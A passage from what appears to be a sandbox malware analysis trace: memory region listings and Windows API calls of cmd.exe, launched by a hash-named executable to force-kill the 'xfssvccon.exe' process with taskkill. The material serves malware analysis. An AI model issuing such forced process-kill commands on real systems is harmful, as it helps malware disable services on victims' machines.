0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2513 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2514 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2515 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2516 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2517 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2518 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2519 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2520 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2521 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2522 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2523 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2524 start_va = 0x4e0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2525 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2526 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2527 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2528 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2529 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2530 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2531 start_va = 0x4e0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2532 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2533 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2534 start_va = 0x730000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2535 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2536 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2537 start_va = 0x8d0000 end_va = 0xc06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 198 os_tid = 0xfc8 [0168.209] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0168.209] __set_app_type (_Type=0x1) [0168.210] __p__fmode () returned 0x74974d6c [0168.210] __p__commode () returned 0x74975b1c [0168.210] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0168.224] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0168.224] GetCurrentThreadId () returned 0xfc8 [0168.224] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc8) returned 0x78 [0168.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0168.225] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0168.225] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.234] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0168.234] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.234] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.234] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.234] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.234] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.234] GetConsoleOutputCP () returned 0x1b5 [0168.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0168.236] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0168.237] _get_osfhandle (_FileHandle=1) returned 0x130 [0168.237] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0168.237] _get_osfhandle (_FileHandle=1) returned 0x130 [0168.237] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0168.237] _get_osfhandle (_FileHandle=0) returned 0x158 [0168.237] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0168.237] GetEnvironmentStringsW () returned 0x537fe8* [0168.237] GetProcessHeap () returned 0x530000 [0168.237] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa1a) returned 0x538a10 [0168.237] FreeEnvironmentStringsA (penv="A") returned 1 [0168.237] GetProcessHeap () returned 0x530000 [0168.237] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4) returned 0x533418 [0168.237] GetEnvironmentStringsW () returned 0x537fe8* [0168.238] GetProcessHeap () returned 0x530000 [0168.238] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa1a) returned 0x539438 [0168.238] FreeEnvironmentStringsA (penv="A") returned 1 [0168.238] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.238] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0168.238] RegCloseKey (hKey=0x88) returned 0x0 [0168.239] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0168.239] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0168.239] RegCloseKey (hKey=0x88) returned 0x0 [0168.239] time (in: timer=0x0 | out: timer=0x0) returned 0x62344216 [0168.239] srand (_Seed=0x62344216) [0168.239] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im xfssvccon.exe \"" [0168.240] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im xfssvccon.exe \"" [0168.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0168.240] GetProcessHeap () returned 0x530000 [0168.240] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x536fb8 [0168.240] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x536fc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0168.240] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0168.240] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0168.241] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.241] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.241] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.241] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.241] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.241] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0168.241] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.241] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.241] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.241] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.241] GetProcessHeap () returned 0x530000 [0168.242] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x538a10) returned 1 [0168.242] GetEnvironmentStringsW () returned 0x537fe8* [0168.242] GetProcessHeap () returned 0x530000 [0168.242] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa32) returned 0x53a8a0 [0168.242] FreeEnvironmentStringsA (penv="A") returned 1 [0168.242] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0168.243] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.243] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.243] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.243] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.243] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.243] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.243] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.243] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.243] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.243] GetProcessHeap () returned 0x530000 [0168.243] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x44) returned 0x537e68 [0168.243] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0168.243] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0168.243] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0168.244] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5371d0 [0168.244] FindClose (in: hFindFile=0x5371d0 | out: hFindFile=0x5371d0) returned 1 [0168.244] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5371d0 [0168.244] FindClose (in: hFindFile=0x5371d0 | out: hFindFile=0x5371d0) returned 1 [0168.245] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0168.245] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5371d0 [0168.245] FindClose (in: hFindFile=0x5371d0 | out: hFindFile=0x5371d0) returned 1 [0168.245] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0168.245] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0168.245] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0168.245] GetProcessHeap () returned 0x530000 [0168.246] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53a8a0) returned 1 [0168.246] GetEnvironmentStringsW () returned 0x537fe8* [0168.246] GetProcessHeap () returned 0x530000 [0168.246] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa76) returned 0x539e60 [0168.246] FreeEnvironmentStringsA (penv="=") returned 1 [0168.246] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0168.246] GetProcessHeap () returned 0x530000 [0168.246] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x537e68) returned 1 [0168.246] GetProcessHeap () returned 0x530000 [0168.247] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400e) returned 0x53bd60 [0168.247] GetProcessHeap () returned 0x530000 [0168.247] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4e) returned 0x537e68 [0168.247] GetProcessHeap () returned 0x530000 [0168.247] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x53fd78 [0168.248] GetProcessHeap () returned 0x530000 [0168.248] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x543d88 [0168.249] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0168.250] GetProcessHeap () returned 0x530000 [0168.250] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x418) returned 0x53a8e0 [0168.250] SetErrorMode (uMode=0x0) returned 0x8003 [0168.250] SetErrorMode (uMode=0x1) returned 0x0 [0168.250] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x53a8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0168.251] SetErrorMode (uMode=0x8003) returned 0x1 [0168.251] GetProcessHeap () returned 0x530000 [0168.251] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x53a8e0, Size=0x80) returned 0x53a8e0 [0168.251] GetProcessHeap () returned 0x530000 [0168.251] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x53a8e0) returned 0x80 [0168.251] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0168.251] GetProcessHeap () returned 0x530000 [0168.251] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x5371d0 [0168.251] GetProcessHeap () returned 0x530000 [0168.251] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb8) returned 0x53a968 [0168.251] GetProcessHeap () returned 0x530000 [0168.251] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x53a968, Size=0x62) returned 0x53a968 [0168.251] GetProcessHeap () returned 0x530000 [0168.251] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x53a968) returned 0x62 [0168.252] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0168.252] GetProcessHeap () returned 0x530000 [0168.252] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe0) returned 0x53a9d8 [0168.257] GetProcessHeap () returned 0x530000 [0168.257] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x53a9d8, Size=0x76) returned 0x53a9d8 [0168.257] GetProcessHeap () returned 0x530000 [0168.257] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x53a9d8) returned 0x76 [0168.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.258] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im xfssvccon.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0168.258] GetLastError () returned 0x3 [0168.258] GetProcessHeap () returned 0x530000 [0168.259] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53fd78) returned 1 [0168.261] GetProcessHeap () returned 0x530000 [0168.261] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x543d88) returned 1 [0168.261] GetProcessHeap () returned 0x530000 [0168.262] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53bd60) returned 1 [0168.262] GetConsoleOutputCP () returned 0x1b5 [0168.267] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0168.267] GetUserDefaultLCID () returned 0x409 [0168.268] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0168.269] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0168.270] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0168.270] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0168.270] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.273] GetProcessHeap () returned 0x530000 [0168.273] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20c) returned 0x53aa58 [0168.274] GetConsoleTitleW (in: lpConsoleTitle=0x53aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0168.278] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0168.278] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0168.278] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0168.279] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0168.279] GetProcessHeap () returned 0x530000 [0168.279] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x53bd60 [0168.279] GetProcessHeap () returned 0x530000 [0168.279] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53bd60) returned 1 [0168.280] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0168.280] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0168.280] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0168.280] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0168.280] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0168.280] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0168.280] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0168.280] 